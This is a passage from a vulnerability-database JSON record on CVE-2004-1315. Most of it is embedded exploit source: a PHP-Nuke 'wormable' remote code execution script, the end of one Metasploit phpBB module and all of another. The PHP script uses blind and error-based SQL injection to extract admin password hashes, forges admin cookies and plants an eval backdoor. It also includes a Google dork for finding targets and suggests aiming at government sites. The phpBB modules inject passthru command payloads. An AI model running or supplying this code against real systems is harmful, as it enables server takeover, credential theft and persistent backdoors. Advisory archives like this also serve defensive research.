25) \n \nprint_status(\"Trying to determine which attack method to use...\") \n \nif (res and res.body =~ /\\<title>phpinfo/) \nbyte = payload.encoded.unpack('C*').map! { |ch| ch = \"chr(#{ch})\" }.join('%252e') \nsploit << \"%2527%252epassthru(#{byte})%252e%2527\" \nelse \nbyte = payload.encoded.unpack('C*').map! { |ch| ch = \"chr(#{ch})\" }.join('.') \nsploit << \"%27.passthru(#{byte}).%27\" \nend \n \nwhen /2\\.0\\.10/ \nbyte = payload.encoded.unpack('C*').map! { |ch| ch = \"chr(#{ch})\" }.join('%252e') \nsploit << \"%2527%252epassthru(#{byte})%252e%2527\" \nwhen /2\\.0\\.15/ \nbyte = payload.encoded.unpack('C*').map! { |ch| ch = \"chr(#{ch})\" }.join('.') \nsploit << \"%27.passthru(#{byte}).%27\" \nend \n \nres = send_request_raw({ \n'uri' => sploit \n}, 25) \n \nend \n \nend \n \nend \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82367/phpbb_highlist.rb.txt"}, {"lastseen": "2016-12-05T22:24:54", "description": "", "published": "2010-05-05T00:00:00", "type": "packetstorm", "title": "PHP-Nuke 7.0 / 8.1 / 8.1.35 Wormable Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1315"], "modified": "2010-05-05T00:00:00", "id": "PACKETSTORM:89190", "href": "https://packetstormsecurity.com/files/89190/PHP-Nuke-7.0-8.1-8.1.35-Wormable-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/php \n<?php \n/******************************************************************************* \nWormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35(newist as of release) \nVendor's Website:http://phpnuke.org/ \nSecuirty Researcher: Michael Brooks (https://sitewat.ch) \nOriginal Advisory: http://blog.sitewat.ch/2010/05/vulnerabilities-in-php-nuke.html \n \nGoogle hack: \n\"Francisco Burzi\" \"Page Generation:\" Seconds inurl:modules.php \n1,170,000 results \nadd inurl:gov to the google hack if you want to make the news ;) \nWorks with maigic_quotes_gpc=On or Off \nWorks with AppArmor and Suhosin Hadend-PHP, tested on Ubuntu 9.04 and 10.04 \nMy own LFI+SQLI attack is used to bypass AppArmor! \nAlso tested XAMPP on Windows XP \nAll tests where done with MySQL5 and PHP5 \nTo obtain a user's cookie: \n1) Register a normal account \n2) Login \n3) Type this into the same address bar and hit enter: javascript:document.cookie \nTo set a cookie you can do use this: javascript:document.cookie=\"admin=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2\" \n*******************************************************************************/ \nset_time_limit(0); \n//The blind_sql_injeciton calss is a general exploit framework that we are inheriting. \nclass php_nuke_blind_sql_injection extends blind_sql_injection { \n//This is the blind sql injection request. \nfunction query($check){ \n//Rate limiter to bypass ipban.php's protection. \n//Must stay below 5 requests every 2 seconds. \nif(!($this->request_count%4)){ \nsleep(2); \n} \n//build the http request to Inject a query: \n//This is a simple get request with a custom referer \n//$this->set_referer(\"'=\"/\\*\" (select \".$check.\" from nuke_authors limit 1))-- */\"); \n$this->set_referer(\"'=(select \".$check.\" from nuke_authors limit 1))-- 1\"); \n/*example get and post request. \n*$this->set_get(\"id=1 or (select \".$check.\" from nuke_authors limit 1))\";//$_GET[id] \n*$this->set_post(\"id=1 or (select \".$check.\" from nuke_authors limit 1))\");//$_POST[id] \n*/ \n} \n} \n//This is a very efficient blind sql injection class. \nclass blind_sql_injection{ \nvar $url, $backup_url, $result, $http, $request_count, $timeout; \nfunction blind_sql_injection($url,$timeout=10){ \n$this->request_count=0; \n$this->url=$url; \n$this->backup_url=$url; \n$this->http=new http_client(); \n$this->timeout=$timeout; \n} \nfunction set_get($get){ \n$this->url=$this->url.\"?\".$get; \n} \nfunction set_referer($referer){ \n$this->http->referer=$referer; \n} \nfunction set_post($post){ \n$this->http->postdata=$post; \n} \nfunction test_target(){ \nreturn $this->send(\"if(true,sleep(\".$this->timeout.\"),0)\")&&!$this->send(\"if(false,sleep(\".$this->timeout.\"),0)\"); \n} \nfunction num_to_hex($arr){ \n$ret=''; \nforeach($arr as $a){ \nif($a<=9){ \n$ret.=$a; \n}else{ \n$ret.=chr(87+$a); \n} \n} \nreturn $ret; \n} \n//Looking for a string of length 32 and base 16 in ascii chars. \nfunction find_md5($column){ \nreturn $this->num_to_hex($this->bin_finder(16,32,\"conv(substring($column,%s,1),16,10)\")); \n} \nfunction find_sha1($column){ \nreturn $this->num_to_hex($this->bin_finder(16,40,\"conv(substring($column,%s,1),16,10)\")); \n} \n//Look for an ascii string of arbitrary length. \nfunction find_string($column){ \n$ret=''; \n//A length of zero means we are looking for a null byte terminated string. \n$result=$this->bin_finder(128,0,\"ascii(substring($column,%s,1))\"); \nforeach($result as $r){ \n$ret.=chr($r); \n} \nreturn $ret; \n} \n//query() is a method that generates the sql injection request \nfunction query($check){ \n//This function must be overridden. \n} \nfunction recheck($result,$question,$base){ \n$this->bin_finder($base,1,$question,$start); \n//Force a long timeout. \n$tmp_timeout=$this->timeout; \nif($this->timeout<10){ \n$this->timeout=10; \n}else{ \n$this->timeout=$this->timeout*2; \n} \n$l=1; \nforeach($result as $r){ \nif($this->send(\"if(\".sprintf($question,$l).\"!=\".$r.\",sleep(\".$this->timeout.\"),0)\")){ \n$result[]=$b; \nbreak; \n} \n$l++; \n} \n$this->timeout=$tmp_timeout; \n} \nfunction linear_finder($base,$length,$question){ \nfor($l=1;$l<=$length;$l++){ \nfor($b=0;$b<$base;$b++){ \nif($this->send(\"if(\".sprintf($question,$l).\"=\".$b.\",sleep(\".$this->timeout.\"),0)\")){ \n$result[]=$b; \nbreak; \n} \n} \n} \n} \n#Binary search for mysql based sql injection. \nfunction bin_finder($base,$length,$question){ \n$start_pos=1; \n$result=''; \nfor($cur=$start_pos;$cur<=$length||$length==0;$cur++){ \n$n=$base-1; \n$low=0; \n$floor=$low; \n$high=$n-1; \n$pos= $low+(($high-$low)/2); \n$found=false; \nwhile($low<=$high&&!$found){ \n#asking the sql database if the current value is greater than $pos \nif($this->send(\"if(greatest(\".sprintf($question,$cur).\",\".$pos.\")!=\".$pos.\",sleep(\".$this->timeout.\"),0)\")){ \n#if this is true then the value must be the modulus. \nif($pos==$n-1){ \n$result[]=$pos+1; \n$found=true; \n}else{ \n$low=$pos+1; \n} \n#asking the sql database if the current value is less than $pos \n}else if($this->send(\"if(least(\".sprintf($question,$cur).\",\".$pos.\")!=\".$pos.\",sleep(\".$this->timeout.\"),0)\")){ \n#if this is true the value must be zero, or in the case of ascii, a null byte. \nif($pos==$floor+1){ \n$found=true; \n#We have found the null terminator so we have finnished our search for a string. \nif($length==0){ \n$length=-1; \n}else{ \n$result[]=$pos-1; \n} \n}else{ \n$high=$pos-1; \n} \n}else{ \n#both greater than and less then where asked, so so then the answer is our guess $pos. \n$result[]=$pos; \n$found=true; \n} \n$pos=$low+(($high-$low)/2); \n} \nprint(\".\"); \n} \nreturn $result; \n} \n//Fire off the request \nfunction send($quesiton){ \n//build the injected query. \n$this->query($quesiton); \n$start=time(); \n$resp=$this->http->send($this->url); \n//backup_url is for set_get() \n$this->url=$this->backup_url; \n$this->request_count++; \nreturn (time()-$start>=$this->timeout); \n} \n//retroGod RIP \nfunction charEncode($string){ \n$char=\"char(\"; \n$size=strlen($string); \nfor($x=0;$x<$size;$x++){ \n$char.=ord($string[$x]).\",\"; \n} \n$char[strlen($char)-1]=\")%00\"; \nreturn $char; \n} \n} \n//General purpose http client that works on a default php install. \nclass http_client{ \nvar $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='', $referer='',$cookie='',$postdata=''; \nfunction send($loc){ \n//overload function polymorphism between gets and posts \n$url=parse_url($loc); \nif(!isset($url['port'])){ \n$url['port']=80; \n} \n$ua='Firefox'; \nif($this->proxy_ip!=''&&$this->proxy_port!=''){ \n$fp = pfsockopen( $this->proxy_ip, $this->proxy_port, &$errno, &$errstr, 120 ); \n$url['path']=$url['host'].':'.$url['port'].$url['path']; \n}else{ \n$fp = fsockopen( $url['host'], $url['port'], &$errno, &$errstr, 120 ); \n} \nif( !$fp ) { \nprint \"$errstr ($errno)<br>\\nn\"; \nreturn false; \n} else { \nif( $this->postdata=='' ) { \n$request=\"GET \".$url['path'].\"?\".$url['query'].\" HTTP/1.1\\r\\n\"; \n} else { \n$request=\"POST \".$url['path'].\"?\".$url['query'].\" HTTP/1.1\\r\\n\"; \n} \nif($this->proxy_name!=''&&$this->proxy_pass!=''){ \n$request.=\"Proxy-Authorization: Basic \".base64_encode($this->proxy_name.\":\".$this->proxy_pass).\"\\r\\n\\r\\n\"; \n} \n$request.=\"Host: \".$url['host'].\":\".$url['port'].\"\\r\\n\"; \n$request.=\"User-Agent: \".$ua.\"\\r\\n\"; \n$request.=\"Accept: text/plain\\r\\n\"; \nif($this->referer!=''){ \n$request.=\"Referer: \".$this->referer.\"\\r\\n\"; \n} \n$request.=\"Connection: Close\\r\\n\"; \nif($this->cookie!=''){ \n$request.=\"Cookie: \".$this->cookie.\"\\r\\n\" ; \n} \nif( $this->postdata!='' ) { \n$strlength = strlen( $this->postdata ); \n$request.=\"Content-type: application/x-www-form-urlencoded\\r\\n\" ; \n$request.=\"Content-length: \".$strlength.\"\\r\\n\\r\\n\"; \n$request.=$this->postdata; \n} \nfputs( $fp, $request.\"\\r\\n\\r\\n\" ); \nwhile( !feof( $fp ) ) { \n$output .= fgets( $fp, 1024 ); \n} \nfclose( $fp ); \n//php_nuke only: \nif(strstr($output,\"too many page loads\")){ \nprint \"REQUEST CAP HIT!\\n\"; \nprint_r(debug_backtrace()); \nprint \"REQUEST CAP HIT!\\n\"; \ndie(); \n} \nreturn $output; \n} \n} \n//Use a http proxy \nfunction proxy($proxy){ //user:pass@ip:port \n$proxyAuth=explode('@',$proxy); \nif(isset($proxyAuth[1])){ \n$login=explode(':',$proxyAuth[0]); \n$this->proxy_name=$login[0]; \n$this->proxy_pass=$login[1]; \n$addr=explode(':',$proxyAuth[1]); \n}else{ \n$addr=explode(':',$proxy); \n} \n$this->proxy_ip=$addr[0]; \n$this->proxy_port=$addr[1]; \n} \n//Parses the results from a PHP error to use as a path disclosure. \nfunction getPath($url,$pops=1){ \n$html=$this->send($url); \n//Regular error reporting: \n$resp=explode(\"array given in <b>\",$html); \nif(isset($resp[1])){ \n$resp = explode(\"</b>\",$resp[1]); \n}else{ \n//xdebug's error reporting: \n$resp=explode(\"array given in \",$html); \nif(isset($resp[1])){ \n$resp = explode(\" \",$resp[1]); \n}else{ \n$resp[0]=false; \n} \n} \n$path=$resp[0]; \n//Can't use dirname() \nif(strstr($path,\"\\\\\")){ \n$p=explode(\"\\\\\",$path); \nfor($x=0;$x<$pops;$x++){ \narray_pop($p); \n} \n$path=implode(\"\\\\\",$p); \n}else{ \n$p=explode(\"/\",$path); \nfor($x=0;$x<$pops;$x++){ \narray_pop($p); \n} \n$path=implode(\"/\",$p); \n} \nreturn $path; \n} \n//Grab the server type from the http header. \nfunction getServer($url){ \n$resp=$this->send($url); \n$header=explode(\"Server: \",$resp); \n$server=explode(\"\\n\",$header[1]); \nreturn $server[0]; \n} \n} \nfunction main(){ \n$user_input=getopt(\"t:c:a:\"); \nif($user_input['t']){ \n$attack_url=$user_input['t']; \nif($user_input['c']){ \n$user_cookie=$user_input['c']; \n} \n//This is only useful for debugging, so its not listed in the useage. \nif($user_input['a']){ \n$admin_cookie=$user_input['a']; \n} \n}else{ \nprint(\"Useage: ./php_exploit -t http://localhost\\n\"); \ndie(\"A user's cookie is required for 8.1.35 : ./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\\n\"); \n} \n$attack_url=str_replace(\"index.php\",\"\",$attack_url); \n$http=new http_client(); \n$sex=new php_nuke_blind_sql_injection($attack_url.\"/\"); \nif(!$admin_cookie){ \n//This is what a cookie looks like: \n//2:user_name:21232f297a57a5a743894a0e4a801fc3:10::0:0:0:0:DeepBlue:4096 \n//$user_cookie=\"user=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2\"; \nif($user_cookie){ \nprint \"Using cookie...\\n\"; \n$http->cookie=$user_cookie; \n//1337+30000 is used as a pivot in parsing, and to test for a sucessful injection. \n//This is NOT Blind SQL Injection, we will be reading the result. This attack works with magic_quotes_gpc on or off. \n$http->postdata=\"title=wow\\\\&bodytext=/*&mood=\".urlencode(\"'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1\").\"&status=no&submit=Add+New+Entry\"; \n$response=$http->send($attack_url.\"/modules.php?name=Journal&file=savenew\"); \n//This part of the exploit is a bit strange sorry for the mess, gotta realease! \nif(strstr($response,\"javascript:history.go(-1)\")){ \n//magic_quotes_gpc=on \n$http->postdata=\"title=wow&jbodytext=text&mood=\".urlencode(\"',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1\").\"&status=no&submit=Add+New+Entry\"; \n$response=$http->send($attack_url.\"/modules.php?name=Journal&file=savenew\"); \n$http->postdata=''; \n//Find the primary key of the journal entry we just created. \n$jid=$http->send($attack_url.\"/modules.php?name=Journal&file=edit\"); \n//we should have the single quote that we escaped at the end of wow' \n$jid=explode(\"\\\">wow<\",$jid); \n$jid=explode(\"jid=\", $jid[0]); \n//Check the journal for the admin's username/password hash \n$response=$http->send($attack_url.\"/modules.php?name=Journal&file=display&jid=\".$jid[1]); \nif(strpos($response,\"31337\")){ \nlist($junk,$aid,$pwd)=explode(\"31337 @ \",$response); \n$aid=explode(\"<\",$aid); \n$pwd=explode(\"<\",$pwd); \n$user_name=$aid[0]; \n$pass_hash=$pwd[0]; \n}else{ \n//magic_quotes_gpc=off \nsleep(3); \n$http->postdata=\"title=wow\\\\&jbodytext=/*&mood=1&status=\".urlencode(\"no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1\").\"&submit=Add+New+Entry\"; \n$response=$http->send($attack_url.\"/modules.php?name=Journal&file=savenew\"); \nsleep(2); \n$jid=$http->send($attack_url.\"/modules.php?name=Journal&file=edit\"); \n$jid=explode(\"\\\">wow<\",$jid); \n$jid=explode(\"jid=\", $jid[0]); \n$jid=explode(\"\\\">\",$jid[1]); \n//Check the journal for the admin's username/password hash \n$response=$http->send($attack_url.\"/modules.php?name=Journal&file=display&jid=\".$jid[0]); \n$inj=explode(\"Last updated on \",$response); \n$inj=explode(\" @ \",$inj[1]); \n$pass_hash=$inj[0]; \n$inj=explode(\"<\",$inj[1]); \n$user_name=$inj[0]; \n} \n}else{ \n$http->postdata=''; \n//Find the primary key of the journal entry we just created. \n$jid=$http->send($attack_url.\"/modules.php?name=Journal&file=edit\"); \n//we should have the single quote that we escaped at the end of wow' \n$jid=explode(\"\\\">wow',<\",$jid); \n$jid=explode(\"jid=\", $jid[0]); \n//Check the journal for the admin's username/password hash \n$response=$http->send($attack_url.\"/modules.php?name=Journal&file=display&jid=\".$jid[1]); \nif(!strpos($response,\"31337\")){ \ndie(\"target has patched!\\n\"); \n}else{ \nprint \"Target vulnerable to a privilege escalation attack!!!\\n\"; \nlist($junk,$aid,$pwd)=explode(\"31337 @ \",$response); \n$aid=explode(\"<\",$aid); \n$pwd=explode(\"<\",$pwd); \n$user_name=$aid[0]; \n$pass_hash=$pwd[0]; \n} \n} \n}else{ \n$sex->sleep=\"sleep(5)\"; \nprint \"Starting Attack Against:\".$attack_url.\"/\\n\"; \nprint \"Testing for blind sql injection...\\n\"; \nif(!$sex->test_target()){ \nprint(\"Target might be running 8.1.35\\n\"); \nprint(\"Try the privilege esciation attack to upload the shell:\"); \ndie(\"./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\\n\"); \n} \nprint \"Target is vulnerable to blind sql injection!!!\\n\"; \nprint \"Please Standby For Attack...\\n\"; \n$pass_hash=$sex->find_md5(\"pwd\"); \n$user_name=$sex->find_string(\"aid\"); \nprint \"attacked used:\".$sex->request_count.\" requests.\\n\"; \n} \nprint \"Found Admin's name:\".$user_name.\"\\n\"; \nprint \"Found MD5 Password hash:\".$pass_hash.\"\\n\"; \n$admin_cookie=\"admin=\".base64_encode($user_name.\":\".$pass_hash.\":\").\";\"; \n} \nprint \"Using Admin Session ID:\\n\".$admin_cookie.\"\\n\"; \n$http->cookie=$admin_cookie; \n//ipban.php \nsleep(3); \n//This request will tell us what version of php-nuke it is. \n//If it is 8, Then the page gives us configuration information to perserve. \n$admin_options=$http->send($attack_url.\"/admin.php?op=general\"); \nif(!strstr($admin_options,\"Content-Length: 0\")){ \nprint \"PHP-Nuke 8 detected.\\n\"; \n$option_values=explode(\"value='\",$admin_options); \n$x=0; \narray_shift($option_values); \n//Parsing out and storing configuration values to restore them after the hack. \nforeach( $option_values as $value){ \n$value=explode(\"'\",$value); \n$values[]=urlencode($value[0]); \nif($x++==4) \nbreak; \n} \n//ipban.php \nsleep(2); \n//Enable error reporting \n$http->postdata=\"xsitename=\".$values[0].\"&xnukeurl=\".$values[1].\"&xslogan=\".$values[2].\"&xstartdate=\".$values[3].\"&xadmingraphic=\".$values[4].\"&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral\"; \n$error_reporting=$http->send($attack_url.\"/admin.php\"); \n//Path diclosure in add_pwd. We will trigger a warning by passing md5() the array add_pwd[]. \n$http->postdata=\"add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor\"; \n$remote_path=$http->getPath($attack_url.\"/admin.php\",3); \nsleep(2); \nif(strstr($remote_path,':\\\\')){ \nprint \"Windows box detected.\\n\"; \nprint \"Remote path:$remote_path\\n\"; \nprint \"Uploading backdoor...\\n\"; \n$remote_path=addslashes(addslashes($remote_path.\"\\\\frontend.php\")); \n$backdoor='get_magic_quotes_gpc()?eval(stripslashes($_GET[\"e\"])):eval($_GET[\"e\"])'; \n//Could have used a concat but php-nuke filters for it. This hides <> from the xss filter. \n//union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php \n$http->postdata=\"chng_uid=\".urlencode(\"' union/**/ select \".$sex->charEncode(\"<?php\").\",'\".$backdoor.\"',\".$sex->charEncode(\"?>\").\",'','','','','','','','','','','','','','','' into outfile '\".$remote_path.\"'-- 1\"); \n$re=$http->send($attack_url.\"/admin.php?op=modifyUser\"); \n//Disable error reporting \n$http->postdata=\"xsitename=\".$values[0].\"&xnukeurl=\".$values[1].\"&xslogan=\".$values[2].\"&xstartdate=\".$values[3].\"&xadmingraphic=\".$values[4].\"&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=0&op=savegeneral\"; \n$error_reporting=$http->send($attack_url.\"/admin.php\"); \n}else{ \nprint \"*nix box detected.\\n\"; \nprint \"Remote path:$remote_path\\n\"; \n//Is mysql on the same machine as the httpd? \nsleep(2); \n$http->postdata=\"chng_uid=\".urlencode(\"' or 1=(select if(substring(load_file('\".$remote_path.\"/index.php'),1,1)='<',0,1))-- 1\"); \n$mysql_check=$http->send($attack_url.\"/admin.php?op=modifyUser\"); \nif(strstr($mysql_check,\"User Doesn't Exists!\")){ \nprint(\"MySQL isn't on the same machine or you do not have file privileges.\\n\"); \ndie(\"Remote code execution failed\\n\"); \n} \nprint \"Uploading backdoor...\\n\"; \n//ipban.php \nsleep(2); \n//Grab the theme, this is needed to repair the database after the LFI \n$theme=$http->send($attack_url.\"/admin.php?op=themes\"); \n$theme=explode('src=\"themes/',$theme); \n$theme=explode('/images/',$theme[1]); \n//Repair the database after the LFI. \n$backdoor_installer='function OpenTable(){} function themeheader(){} $db->sql_query(\"update \".$prefix.\"_config set Default_Theme='.$sex->charEncode($theme[0]).', display_errors=0\");'; \n//This is a magic_quotes_gpc and mysql safe backdoor that fits on one line. \n$backdoor='get_magic_quotes_gpc()?eval(stripslashes(\".chr(36).\"_GET[\".chr(34).\"e\".chr(34).\"])):eval(\".chr(36).\"_GET[\".chr(34).\"e\".chr(34).\"])'; \n//Install the backdoor in a relitive directory. \n$backdoor_installer.='file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].dirname($_SERVER[\"SCRIPT_NAME\"]).\"/frontend.php\",chr(60).\"?php '.$backdoor.'?\".chr(62));'; \n//charEncode is used to bypass XSS filters. \n//union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php \n$http->postdata=\"chng_uid=\".urlencode(\"' union/**/ select \".$sex->charEncode(\"<?php\").\",'\".$backdoor_installer.\"',\".$sex->charEncode(\"?>\").\",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1\"); \n$http->send($attack_url.\"/admin.php?op=modifyUser\"); \nsleep(2); \n//local file include vulnerablity to execute /tmp/theme.php \n$http->postdata=\"xDefault_Theme=../../../../../../../../../../../tmp&xoverwrite_theme=0&op=savethemes\"; \n$http->send($attack_url.\"/admin.php\"); \nsleep(2); \n$http->postdata=''; \n//Fire off a get request to trigger the uploaded php file using LFI \n$http->send($attack_url); \nsleep(2); \n//Try the LFI again, just in case. \n$http->send($attack_url.\"/admin.php\"); \n} \nsleep(2); \n//test if the backdoor works, try and clean up after the exploit. \n$test_backdoor=$http->send($attack_url.\"/frontend.php?e=\".urlencode(\"echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');\")); \nif(strstr($test_backdoor,\"31337\")){ \nprint \"Remote Code execution tested successfully:\\n\".$attack_url.\"/frontend.php?e=phpinfo()\".urlencode(';').\"\\n\"; \n}else{ \nprint \"Backdoor install failed!\\n\"; \n} \n}else{ \n////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module. \nprint \"PHP-Nuke 7 detected.\\n\"; \n$http->postdata=\"\";//send get requests. \n//Fire off a check for CVE-2004-1315, phpbb maybe installed. \n//This is more like the oringal CVE-2004-1315: %2527.printf(20041315).%2527 \n//php-nuke was not vulnerable to this because of mainfile line 50: \\([^>]*\"?[^)]*\\) \n//to byapss this check double urlencode the parren () %2527.printf%252820041315%2529.%2527 \n$try_exploit=$http->send($attack_url.\"/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527\"); \n//if the exploit didn't work, then we might have to enable phpbb and populate it. \nif(!strstr($try_exploit,\"20041315\")){ \n//Enalbe PHPBB \n$http->send($attack_url.\"/admin.php?op=module_status&mid=22&active=1\"); \n//create a new category for phpbb \n$http->postdata=\"mode=addcat&categoryname=test&addcategory=Create+new+category\"; \n$t=$http->send($attack_url.\"/modules/Forums/admin/admin_forums.php\"); \n//ipban.php \nsleep(2); \n//create a new form in the new category \n$http->postdata=\"forumname%5B1%5D=t&addforum%5B1%5D=Create+new+forum&categoryname=test\"; \n$t=$http->send($attack_url.\"/modules/Forums/admin/admin_forums.php?\"); \n$http->postdata=\"forumname=t&forumdesc=t&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create+new+forum\"; \n$http->send($attack_url.\"/modules/Forums/admin/admin_forums.php?\"); \n//create a new topic in the new form \n$http->postdata=\"username=t&subject=t&addbbcode18=%23444444&addbbcode20=12&helpbox=Insert+URL%3A+%5Burl%5Dhttp%3A%2F%2Furl%5B%2Furl%5D+or+%5Burl%3Dhttp%3A%2F%2Furl%5DURL+text%5B%2Furl%5D++%28alt%2Bw%29&message=test&mode=newtopic&f=1&post=Submit\"; \n$http->send($attack_url.\"/modules.php?name=Forums&file=posting\"); \n//ipban.php \nsleep(2); \n//access the first topic. \n$http->postdata=\"\"; \n//Check to see if any of the first 10 topics are exploitable. \nfor($t=1;$t<10&&!strstr($try_exploit,\"20041315\");$t++){ \n//Fire off a check for CVE-2004-1315. \n$try_exploit=$http->send($attack_url.\"/modules.php?name=Forums&file=viewtopic&t=\".$t.\"&highlight=%2527.printf%252820041315%2529.%2527\"); \n} \n} \n//Check if we where able to hit CVE-2004-1315. \nif(strstr($try_exploit,\"20041315\")){ \nprint(\"Remote Code execution tested successfully:\\n\".$attack_url.\"/modules.php?name=Forums&file=viewtopic&t=\".--$t.\"&highlight=%2527.phpinfo%2528%2529.%2527\\nThis is a Doulbe urlencode()\\n\"); \n}else{ \nprint(\"Remote code execution has failed!\\n\"); \n} \n} \n} \nmain(); \n?> \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/89190/phpnukeworm-exec.txt"}], "metasploit": [{"lastseen": "2020-08-19T23:53:47", "description": "This module exploits two arbitrary PHP code execution flaws in the phpBB forum system. The problem is that the 'highlight' parameter in the 'viewtopic.php' script is not verified properly and will allow an attacker to inject arbitrary code via preg_replace(). This vulnerability was introduced in revision 3076, and finally fixed in revision 5166. According to the \"tags\" within their tree, this corresponds to versions 2.0.4 through 2.0.15 (inclusive).\n", "published": "2008-03-05T09:42:57", "type": "metasploit", "title": "phpBB viewtopic.php Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1315", "CVE-2005-2086"], "modified": "2017-11-08T16:00:24", "id": "MSF:EXPLOIT/UNIX/WEBAPP/PHPBB_HIGHLIGHT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'phpBB viewtopic.php Arbitrary Code Execution',\n 'Description' => %q{\n This module exploits two arbitrary PHP code execution flaws in the\n phpBB forum system. The problem is that the 'highlight' parameter\n in the 'viewtopic.php' script is not verified properly and will\n allow an attacker to inject arbitrary code via preg_replace().\n\n This vulnerability was introduced in revision 3076, and finally\n fixed in revision 5166. According to the \"tags\" within their tree,\n this corresponds to versions 2.0.4 through 2.0.15 (inclusive).\n },\n 'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-2086'],\n [ 'CVE', '2004-1315'],\n [ 'OSVDB', '11719'],\n [ 'OSVDB', '17613'],\n [ 'BID', '14086'],\n [ 'BID', '10701'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 1024,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',\n }\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n [ 'Automatic', \t\t{ }],\n [ 'phpbb <=2.0.10', \t{ }],\n [ 'phpbb <=2.0.15', \t{ }],\n ],\n 'DisclosureDate' => 'Nov 12 2004',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URI', [true, \"The phpBB root Directory\", \"/phpBB2\"]),\n OptString.new('TOPIC', [false, \"The ID of a valid topic\"]),\n ])\n end\n\n def find_topic\n\n 1.upto(32) do |x|\n\n res = send_request_raw({\n 'uri'\t=> normalize_uri(datastore['URI'], '/viewtopic.php') + '?topic=' + x.to_s,\n }, 25)\n\n if (res and res.body.match(/class=\"postdetails\"/))\n print_status(\"Discovered valid topic ID: #{x}\")\n return x\n end\n\n end\n return false\n\n end\n\n def exploit\n\n topic = datastore['TOPIC'] || find_topic\n\n if !(topic)\n print_status(\"No valid topic ID found, please specify the TOPIC option.\")\n return\n else\n\n sploit = normalize_uri(datastore['URI'], \"/viewtopic.php\") + \"?t=#{topic}&highlight=\"\n\n case target.name\n when /Automatic/\n req = \"/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527\"\n\n res = send_request_raw({\n 'uri'\t=> normalize_uri(datastore['URI'], req)\n }, 25)\n\n print_status(\"Trying to determine which attack method to use...\")\n\n if (res and res.body =~ /\\<title>phpinfo/)\n byte = payload.encoded.unpack('C*').map! { |ch| ch = \"chr(#{ch})\" }.join('%252e')\n sploit << \"%2527%252epassthru(#{byte})%252e%2527\"\n else\n byte = payload.encoded.unpack('C*').map! { |ch| ch = \"chr(#{ch})\" }.join('.')\n sploit << \"%27.passthru(#{byte}).%27\"\n end\n\n when /2\\.0\\.10/\n byte = payload.encoded.unpack('C*').map! { |ch| ch = \"chr(#{ch})\" }.join('%252e')\n sploit << \"%2527%252epassthru(#{byte})%252e%2527\"\n when /2\\.0\\.15/\n byte = payload.encoded.unpack('C*').map! { |ch| ch = \"chr(#{ch})\" }.join('.')\n sploit << \"%27.passthru(#{byte}).%27\"\n end\n\n res = send_request_raw({\n 'uri'\t=> sploit\n }, 25)\n\n end\n\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/phpbb_highlight.rb"}], "gentoo": [{"lastseen": "2016-09-06T19:47:03", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1315"], "description": "### Background\n\nphpBB is an Open Source bulletin board package. \n\n### Description\n\nphpBB contains a vulnerability in the highlighting code and several vulnerabilities in the username handling code. \n\n### Impact\n\nAn attacker can exploit the 